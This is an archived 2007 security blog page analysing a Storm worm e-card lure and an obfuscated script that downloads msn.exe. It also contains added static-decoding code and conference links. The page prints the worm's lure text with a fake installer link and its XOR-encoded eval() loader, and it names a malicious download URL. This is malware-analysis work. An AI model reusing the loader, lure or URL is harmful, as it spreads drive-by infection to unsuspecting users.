Archive for August, 2007

Ecard Worm is using “function kaspersky(suck,dick){};”

Posted in Uncategorized on August 15, 2007 by ianstarkc

This time the ecard (aka Storm worm) variant defines two empty functions in the encoded JavaScript. Just look at the encoded JavaScript:

To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href="/msdataaccess.exe">click here</a>.<div id="mydiv"></div>
<Script Language='JavaScript'>
function xor_str(plain_str, xor_key){
    var xored_str = "";
    for (var i = 0 ; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}
function kaspersky(suck,dick){};
function kaspersky2(suck_dick,again){};
var plain_str = "\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57";
var xored_str = xor_str(plain_str, 93);
eval(xored_str);
</script>
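To see what eval(xored_str) would have run, here is an added decoder (my own code, not code from the post or from the worm). It applies the same single-byte XOR transform to the byte string and key quoted above but returns the text instead of executing it, and it goes one step beyond this sample by ranking all 256 possible keys, for the case where the key is computed at runtime rather than written in the clear. The decoded stage turns out to be a few declarations plus a call to start(), a function the quoted excerpt does not define.

```javascript
// Added example (not the blog's own code): decode the XOR stage statically,
// i.e. recover the text that eval() would have run without executing it.

// Byte string and key copied verbatim from the ecard script quoted above.
const PLAIN_STR = "\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57";
const XOR_KEY = 93;

// Same transform as the page's xor_str(): every char code XORed with a 1-byte key.
function xorDecode(data, key) {
  let out = '';
  for (let i = 0; i < data.length; ++i) {
    out += String.fromCharCode(key ^ data.charCodeAt(i));
  }
  return out;
}

// Fraction of characters that are printable ASCII or ordinary whitespace.
function printableRatio(s) {
  if (s.length === 0) return 0;
  let ok = 0;
  for (const ch of s) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) ok++;
  }
  return ok / s.length;
}

// Count of JavaScript-looking fragments in a candidate decoding (constructed list).
const JS_TOKENS = ['var ', 'function', 'new ', 'document', 'window', 'eval(', '();', '= '];
function jsTokenScore(s) {
  let score = 0;
  for (const tok of JS_TOKENS) {
    let idx = s.indexOf(tok);
    while (idx !== -1) {
      score++;
      idx = s.indexOf(tok, idx + tok.length);
    }
  }
  return score;
}

// When the key is not visible, try all 256 single-byte keys and rank the
// results by how much they look like JavaScript; the real key comes out on top.
function bruteForceKey(data) {
  const candidates = [];
  for (let key = 0; key < 256; key++) {
    const text = xorDecode(data, key);
    candidates.push({ key, tokens: jsTokenScore(text), printable: printableRatio(text), text });
  }
  candidates.sort((a, b) => (b.tokens - a.tokens) || (b.printable - a.printable) || (a.key - b.key));
  return candidates;
}

// Decode the page's sample with the key the script carries in the clear.
function decodeSample() {
  return xorDecode(PLAIN_STR, XOR_KEY);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(decodeSample()));
  const best = bruteForceKey(PLAIN_STR)[0];
  console.log('best key guess: ' + best.key + ' (token score ' + best.tokens + ')');
}
```

Run it with node and the first line printed is the decoded stage; the key ranking is only needed when the 93 is not sitting in the script as it is here, but on this sample the token scoring still puts key 93 first. A stage that ends in a call to an undefined function like start() is a hint that the quoted excerpt is one piece of a larger page, so the remaining markup should be collected before drawing conclusions.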


BlackHat USA’07 & DEFCON 15

Posted in Uncategorized on August 9, 2007 by ianstarkc

Awesome conferences!! It will take them some time to upload the slides; meanwhile, if you want to download the slides, check here:

BlackHat USA’07

http://www.hotsecuritynews.com/bh-usa-07/

Defcon-15

http://www.freelanceresearch.org/DEFCON_15.iso

http://bzimage.spymac.net/DEFCON_15.iso

http://garaged.homeip.net/DEFCON15/

“msn.exe” download using Script

Posted in Uncategorized on August 9, 2007 by ianstarkc

A few days ago I came across a website where the infamous obfuscated script was used to download a malicious file from another website. The script is decoded through the eval() function and String.fromCharCode(). If you search for these functions in Google you'll find lots of websites, and even malicious ones; that's how I found this one!
See the screenshots below.

When you open http://buyford.co.kr/1/1/1.htm ... this HTML page has JavaScript that downloads the malicious file "msn.exe" from an IP address; moreover, I found that this IP changes from time to time. "msn.exe" then downloads a file "test.txt" which holds the address of another malicious file, "svchost.exe". Just look at the screenshots and you'll get the story :-)
[Screenshot 1]

After decoding, the script looks like this. On visiting the site, "The page cannot be found" is displayed while in the background the VBScript runs, downloads msn.exe from the IP, saves it as "zhu3.com" and finally executes this file.

[Screenshot 4]

[Screenshot 2]

[Screenshot 3]
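The eval()/String.fromCharCode() trick described in this post can be unwrapped without ever loading the page in a browser. The following is an added example (my own code, not the script from buyford.co.kr and not the post's own decoding); it works on a constructed two-layer sample rather than the real msn.exe downloader, peels each eval(String.fromCharCode(...)) layer statically with a regular expression, and reports the traits an analyst would triage on.

```javascript
// Added example (not the blog's own code): statically unwrap the
// eval(String.fromCharCode(...)) obfuscation without executing anything,
// and flag the traits that make such a page suspicious.

// Matches eval(String.fromCharCode(<comma separated decimal codes>)).
const FROMCHARCODE_RE = /eval\s*\(\s*String\.fromCharCode\s*\(\s*([0-9\s,]+?)\s*\)\s*\)/;

// Peel one layer: return the decoded payload, or null when the pattern is absent.
function unwrapOnce(script) {
  const m = FROMCHARCODE_RE.exec(script);
  if (!m) return null;
  const codes = m[1]
    .split(',')
    .map(s => parseInt(s.trim(), 10))
    .filter(n => !Number.isNaN(n));
  return String.fromCharCode(...codes);
}

// Peel layers repeatedly (obfuscators often nest several), keeping every stage.
function unwrapAll(script, maxLayers = 10) {
  const stages = [script];
  for (let i = 0; i < maxLayers; i++) {
    const next = unwrapOnce(stages[stages.length - 1]);
    if (next === null) break;
    stages.push(next);
  }
  return stages;
}

// Heuristic triage: which obfuscation traits are present in the script text.
function obfuscationTraits(script) {
  return {
    usesEval: /\beval\s*\(/.test(script),
    usesFromCharCode: /String\.fromCharCode/.test(script),
    longNumericList: /(?:\d+\s*,\s*){20,}\d+/.test(script),
    hexEscapes: /\\x[0-9a-fA-F]{2}/.test(script),
  };
}

// Constructed sample (not from the page): a benign inner script wrapped in two
// layers of eval(String.fromCharCode(...)), the same trick the post describes.
function wrapInFromCharCode(inner) {
  const codes = Array.from(inner, ch => ch.charCodeAt(0)).join(',');
  return 'eval(String.fromCharCode(' + codes + '))';
}
const INNER_SCRIPT = 'document.write("<b>The page cannot be found</b>");';
const SAMPLE_SCRIPT = wrapInFromCharCode(wrapInFromCharCode(INNER_SCRIPT));

// Fully unwrap the constructed sample and return the innermost stage.
function decodeSample() {
  const stages = unwrapAll(SAMPLE_SCRIPT);
  return stages[stages.length - 1];
}

if (typeof require !== 'undefined' && require.main === module) {
  unwrapAll(SAMPLE_SCRIPT).forEach((s, i) => console.log('stage ' + i + ': ' + s));
  console.log(obfuscationTraits(SAMPLE_SCRIPT));
}
```

The regex approach is deliberately narrow: it only handles decimal code lists, so a sample that mixes in unescape() or arithmetic on the codes will stop at that layer and need a further rule. That is the trade-off of static unwrapping versus running the script in an instrumented interpreter, which is what the CaffeineMonkey work referenced below does at scale.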

Have a look at this slide:

"CaffeineMonkey: Automated Collection, Detection and Analysis of Malicious JavaScript", see http://www.blackhat.com/html/bh-usa-07/bh-usa-07-speakers.html#Feinstein